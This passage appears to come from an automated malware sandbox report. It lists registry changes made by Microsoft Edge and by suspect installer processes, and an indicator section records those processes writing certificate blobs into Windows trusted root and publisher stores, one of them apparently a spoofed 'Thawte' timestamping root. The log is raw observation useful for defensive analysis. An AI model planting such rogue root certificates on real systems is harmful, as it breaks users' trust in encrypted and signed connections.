Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\SharedCookie_MRACMigrationDone = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{74WP1CM3-506M-V62R-WR42-7MQP227Y2YLP} reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 5e0b2b553d99d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListFirstRun = "3" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 1d24df8b702cd701 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\FirstRecoveryTime = 1d24df8b702cd701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{62FM2EJ3-714D-A09D-WM25-6QFJ226I1FER} Setup.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\BD518F1D8A57959CA3F1DBB764939CCFA4D23D04\Blob = 030000000100000014000000bd518f1d8a57959ca3f1dbb764939ccfa4d23d042000000001000000a20200003082029e30820207a00302010202084fd2097d021087ca300d06092a864886f70d01010b050030753120301e06035504030c17546832617774652054696d657374616d70696e67204341311d301b060355040b0c145468617774652043657274696669636174696f6e310f300d060355040a0c06546861777465310b3009060355040613025a413114301206035504070c0b44757262616e76696c6c65301e170d3139303832353233303530395a170d3233303832343233303530395a30753120301e06035504030c17546832617774652054696d657374616d70696e67204341311d301b060355040b0c145468617774652043657274696669636174696f6e310f300d060355040a0c06546861777465310b3009060355040613025a413114301206035504070c0b44757262616e76696c6c6530819f300d06092a864886f70d010101050003818d0030818902818100c9437a619b80799314373f2761fc356001fac81185e4ebfcab82c3b3da9e7e3c72b9419d27efafcf9512cb607b92585436dc4205809f6fd9bc1ea0600d8788d3b0106b73a4e562cb8794561273ee6c493af38be0045b2f4f23beee80f8ebd605a8f11fecaf880d1480e37a352507f2231dcb97cecb18c73a790769eabe3ea17f0203010001a3373035300f0603551d130101ff040530030101ff30220603551d11041b30198217546832617774652054696d657374616d70696e67204341300d06092a864886f70d01010b050003818100b80387219e06244e9e66391b3bb226d6c06fddbdb0a03ac7ee686e2f70a4b62bb6c918915f8e195380d1ee4c3e09f4c688b9fd86ef35f93f9c2ee94b426a972089c08039023d1c9e306b3e5aade9cc226898d0d2acebe25bc2507a2508dae4fb82c9bb4e80b1b3a11a64651609ed092bb5c956a03939b46fa2fe86d86db3ed2c RUNDLL32.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\BD518F1D8A57959CA3F1DBB764939CCFA4D23D04\Blob = 0f0000000100000020000000a6dc2db563b0db49f821ccbd39e9beb086cd464716edc68d2c118f9449b388a6030000000100000014000000bd518f1d8a57959ca3f1dbb764939ccfa4d23d041400000001000000140000002ac113c4ddc9f98d03b1fc9ba729bdf7cc1657f42000000001000000a20200003082029e30820207a00302010202084fd2097d021087ca300d06092a864886f70d01010b050030753120301e06035504030c17546832617774652054696d657374616d70696e67204341311d301b060355040b0c145468617774652043657274696669636174696f6e310f300d060355040a0c06546861777465310b3009060355040613025a413114301206035504070c0b44757262616e76696c6c65301e170d3139303832353233303530395a170d3233303832343233303530395a30753120301e06035504030c17546832617774652054696d657374616d70696e67204341311d301b060355040b0c145468617774652043657274696669636174696f6e310f300d060355040a0c06546861777465310b3009060355040613025a413114301206035504070c0b44757262616e76696c6c6530819f300d06092a864886f70d010101050003818d0030818902818100c9437a619b80799314373f2761fc356001fac81185e4ebfcab82c3b3da9e7e3c72b9419d27efafcf9512cb607b92585436dc4205809f6fd9bc1ea0600d8788d3b0106b73a4e562cb8794561273ee6c493af38be0045b2f4f23beee80f8ebd605a8f11fecaf880d1480e37a352507f2231dcb97cecb18c73a790769eabe3ea17f0203010001a3373035300f0603551d130101ff040530030101ff30220603551d11041b30198217546832617774652054696d657374616d70696e67204341300d06092a864886f70d01010b050003818100b80387219e06244e9e66391b3bb226d6c06fddbdb0a03ac7ee686e2f70a4b62bb6c918915f8e195380d1ee4c3e09f4c688b9fd86ef35f93f9c2ee94b426a972089c08039023d1c9e306b3e5aade9cc226898d0d2acebe25bc2507a2508dae4fb82c9bb4e80b1b3a11a64651609ed092bb5c956a03939b46fa2fe86d86db3ed2c UpdateCore.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Setup (18).exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Setup (18).exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\BD518F1D8A57959CA3F1DBB764939CCFA4D23D04 Taexaeshocife.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\BD518F1D8A57959CA3F1DBB764939CCFA4D23D04\Blob = 5c0000000100000004000000000400001900000001000000100000000e1e1e16b898a43dddcb96b95a90065c0f0000000100000020000000a6dc2db563b0db49f821ccbd39e9beb086cd464716edc68d2c118f9449b388a6030000000100000014000000bd518f1d8a57959ca3f1dbb764939ccfa4d23d041400000001000000140000002ac113c4ddc9f98d03b1fc9ba729bdf7cc1657f4040000000100000010000000938ea0f1fa1b4bcab80da1bbedb37c0c2000000001000000a20200003082029e30820207a00302010202084fd2097d021087ca300d06092a864886f70d01010b050030753120301e06035504030c17546832617774652054696d657374616d70696e67204341311d301b060355040b0c145468617774652043657274696669636174696f6e310f300d060355040a0c06546861777465310b3009060355040613025a413114301206035504070c0b44757262616e76696c6c65301e170d3139303832353233303530395a170d3233303832343233303530395a30753120301e06035504030c17546832617774652054696d657374616d70696e67204341311d301b060355040b0c145468617774652043657274696669636174696f6e310f300d060355040a0c06546861777465310b3009060355040613025a413114301206035504070c0b44757262616e76696c6c6530819f300d06092a864886f70d010101050003818d0030818902818100c9437a619b80799314373f2761fc356001fac81185e4ebfcab82c3b3da9e7e3c72b9419d27efafcf9512cb607b92585436dc4205809f6fd9bc1ea0600d8788d3b0106b73a4e562cb8794561273ee6c493af38be0045b2f4f23beee80f8ebd605a8f11fecaf880d1480e37a352507f2231dcb97cecb18c73a790769eabe3ea17f0203010001a3373035300f0603551d130101ff040530030101ff30220603551d11041b30198217546832617774652054696d657374616d70696e67204341300d06092a864886f70d01010b050003818100b80387219e06244e9e66391b3bb226d6c06fddbdb0a03ac7ee686e2f70a4b62bb6c918915f8e195380d1ee4c3e09f4c688b9fd86ef35f93f9c2ee94b426a972089c08039023d1c9e306b3e5aade9cc226898d0d2acebe25bc2507a2508dae4fb82c9bb4e80b1b3a11a64651609ed092bb5c956a03939b46fa2fe86d86db3ed2c Taexaeshocife.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA Setup.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0f00000001000000140000001b4e387db74a69a0470cb08f598beb3b511617530300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be GameBoxWin64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\BD518F1D8A57959CA3F1DBB764939CCFA4D23D04\Blob = 1900000001000000100000000e1e1e16b898a43dddcb96b95a90065c0f0000000100000020000000a6dc2db563b0db49f821ccbd39e9beb086cd464716edc68d2c118f9449b388a6030000000100000014000000bd518f1d8a57959ca3f1dbb764939ccfa4d23d041400000001000000140000002ac113c4ddc9f98d03b1fc9ba729bdf7cc1657f4040000000100000010000000938ea0f1fa1b4bcab80da1bbedb37c0c2000000001000000a20200003082029e30820207a00302010202084fd2097d021087ca300d06092a864886f70d01010b050030753120301e06035504030c17546832617774652054696d657374616d70696e67204341311d301b060355040b0c145468617774652043657274696669636174696f6e310f300d060355040a0c06546861777465310b3009060355040613025a413114301206035504070c0b44757262616e76696c6c65301e170d3139303832353233303530395a170d3233303832343233303530395a30753120301e06035504030c17546832617774652054696d657374616d70696e67204341311d301b060355040b0c145468617774652043657274696669636174696f6e310f300d060355040a0c06546861777465310b3009060355040613025a413114301206035504070c0b44757262616e76696c6c6530819f300d06092a864886f70d010101050003818d0030818902818100c9437a619b80799314373f2761fc356001fac81185e4ebfcab82c3b3da9e7e3c72b9419d27efafcf9512cb607b92585436dc4205809f6fd9bc1ea0600d8788d3b0106b73a4e562cb8794561273ee6c493af38be0045b2f4f23beee80f8ebd605a8f11fecaf880d1480e37a352507f2231dcb97cecb18c73a790769eabe3ea17f0203010001a3373035300f0603551d130101ff040530030101ff30220603551d11041b30198217546832617774652054696d657374616d70696e67204341300d06092a864886f70d01010b050003818100b80387219e06244e9e66391b3bb226d6c06fddbdb0a03ac7ee686e2f70a4b62bb6c918915f8e195380d1ee4c3e09f4c688b9fd86ef35f93f9c2ee94b426a972089c08039023d1c9e306b3e5aade9cc226898d0d2acebe25bc2507a2508dae4fb82c9bb4e80b1b3a11a64651609ed092bb5c956a03939b46fa2fe86d86db3ed2c UpdateCore.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC Setup.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC GameBoxWin64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\BD518F1D8A57959CA3F1DBB764939CCFA4D23D04 UpdateCore.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 GameBoxWin64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA GameBoxWin64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\BD518F1D8A57959CA3F1DBB764939CCFA4D23D04 RUNDLL32.EXE Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B Setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880da